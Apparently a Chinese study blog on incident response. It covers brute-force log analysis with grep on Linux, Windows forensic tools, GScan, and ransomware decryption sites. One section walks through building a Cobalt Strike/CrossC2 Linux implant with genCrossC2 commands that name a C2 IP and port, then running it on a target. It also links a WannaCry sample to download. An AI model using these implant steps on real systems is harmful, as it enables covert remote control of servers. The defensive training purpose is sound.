win&linux分析后门&勒索病毒&攻击

c00912407e6439e0bdc437fca630fd9a

  1. 常见危害
  • 暴力破解
  • 漏洞利用
  • 流量攻击
  • 木马控制(Webshell,PC 木马等)
  • 病毒感染(挖矿,蠕虫,勒索等)
  1. 常见分析
  • 计算机账户
  • 端口
  • 进程
  • 网络
  • 启动
  • 服务
  • 任务
  • 文件等安全问题

补充资料

病毒分析

病毒查杀

病毒动态

在线病毒扫描网站

攻击响应-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion

  • 事件归类
  • 事件 ID
  • 事件状态等
  • 参考百度资料

Linux-grep 筛选

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c

#2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1

#3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr

#4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

#5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

Snipaste_2023-08-13_21-21-25

Snipaste_2023-08-13_21-21-53

Snipaste_2023-08-13_21-22-05

Snipaste_2023-08-13_21-22-39

后面这几条没有显示,是因为我没有成功用ssh远程登录过

Snipaste_2023-08-13_21-24-25

案例演示1-windows日志查看

Snipaste_2023-08-13_21-25-17

Snipaste_2023-08-13_21-24-51

分为应用程序(软件信息)、安全(登录信息)、设置、系统(服务策略信息)

windows日志位置

windows自带日志工具不好用,查找分析不方便,推荐使用插件LogFusion

Snipaste_2023-08-13_21-38-21

然后去服务器上查看日志

Snipaste_2023-08-13_21-52-09

Snipaste_2023-08-13_21-54-51

双击进入,查看详细信息(可以看到是哪个IP地址爆破密码成功,成功登录了本机)但是这个不能显示登录失败的ip

Snipaste_2023-08-13_21-56-57

案例演示2-linux日志查看

linux日志位置

首先使用ssh协议进行爆破登录攻击,这里我就没有用工具了,我直接错误连接三次就行了

截图放上面了

控制响应-后门木马(Webshell,PC)-Win,Linux

TCPView工具,可以查看哪个进程与远程IP通信过,从而确定系统是否曾经遭受过攻击。(windows自带工具,不推荐)

Snipaste_2023-08-13_22-14-31

Process Explorer工具,可以查看分析进程(windows自带)

Snipaste_2023-08-13_22-16-07

点开可以看进程id,路径,用户,开始时间等等

Snipaste_2023-08-13_22-17-35

PCHunter工具。集成了查看进程和ip通信进程查看

缺点是:windows高版本网络信息获取不全。比如木马在windows7执行后,该工具可以获取网络信息

win10打开提示驱动加载失败

Snipaste_2023-08-13_22-20-34

UserAssistView工具,可以看到所有在windows系统上执行过的文件的时间(判断黑客在什么时候进行入侵,分析入侵前是如何入侵的,入侵后做了啥)

Snipaste_2023-08-14_06-12-42

logonsession工具,可以看到当前主机有哪些会话连接过,从而分析有没有过远程攻击

Snipaste_2023-08-14_06-16-19

总的来说:PCHunter+UserAssistView+logonsession最好

Linux分析

CS是windows渗透工具,但是后期经过一些插件的开发,CS也可以上线linux系统,比如CS借助CrossC2项目上线linux主机

下载:https://github.com/gloxec/CrossC2/releases

上传到云服务器(这里我用虚拟机)的cs目录下,并且赋予执行权限

Snipaste_2023-08-14_07-00-18

Snipaste_2023-08-14_07-03-51

下载这两个文件,自定义一个目录,cs上创建一个监听器

Snipaste_2023-08-14_07-04-08

Snipaste_2023-08-14_07-06-07

Snipaste_2023-08-14_07-07-41

打开下载的CrossC2-GithubBot-2023-08-08.cna

加载…

Snipaste_2023-08-14_07-09-26

加载成功之后会出现下图的选项,有的版本的选项不再这(那就需要自行百度了)

Snipaste_2023-08-14_07-10-13

Snipaste_2023-08-14_07-34-58

Snipaste_2023-08-14_07-35-07

生成之后,会在服务端生成一个key文件(隐藏文件,如果是linux需要 ls -a或者 ll -a

Snipaste_2023-08-14_06-43-35

然后保证gencrossC2这个文件跟key文件是在同一个目录

1
2
genCrossC2 192.168.70.128 8756 ./.cobaltstrike.beacon_keys null Linux x64 ./a.elf
./genCrossC2.Linux 121.40.173.182 9875 null null Linux x64 C2

将生成的木马上传到目标服务器上,执行

Snipaste_2023-08-14_07-41-40

Snipaste_2023-08-14_06-50-04

自动化响应检测-Gscan 多重功能脚本测试-Linux

GScan下载:https://github.com/grayddq/GScan/

GScan功能:1、主机信息获取2、系统初始化alias检查3、文件类安全扫描4、各用户历史操作类5、进程类安全检测6、网络类安全检测7、后门类检测8、账户类安全排查9、日志类安全分析10、安全配置类分析11、Rootkit分析12.WebShell类文件扫描—Python3运行文件—扫描的结果**–**-netstat -ntl可以查看tcp端口等,再通过ps命令找到对应的进程,分析其是否是木马病毒—ps命令显示linux进程信息,进程信息主要包括进程用户、pid、内存、cpu、启动时间、路径、终端等

这工具emmm,已经两年没更新

Snipaste_2023-08-14_08-27-49

危害响应-病毒感染(勒索 WannaCry)-Windows

勒索病毒解密网站

  • https://lesuobingdu.360.cn/
  • https://www.nomoreransom.org/zh/index.html
  • [下载]永恒之蓝样本(勒索病毒): https://bbs.pediy.com/thread-217586-1.htm

下载勒索病毒样本,在虚拟机上执行(不要在本机执行,谨慎执行)

Snipaste_2023-08-14_08-29-19

—可以使用360勒索病毒解密网站进行病毒查询、在线解密等。

—也可以使用nomoreransom网站尝试解密。

—下载电脑管家、360、火绒等等利用小工具解密(不一定成功)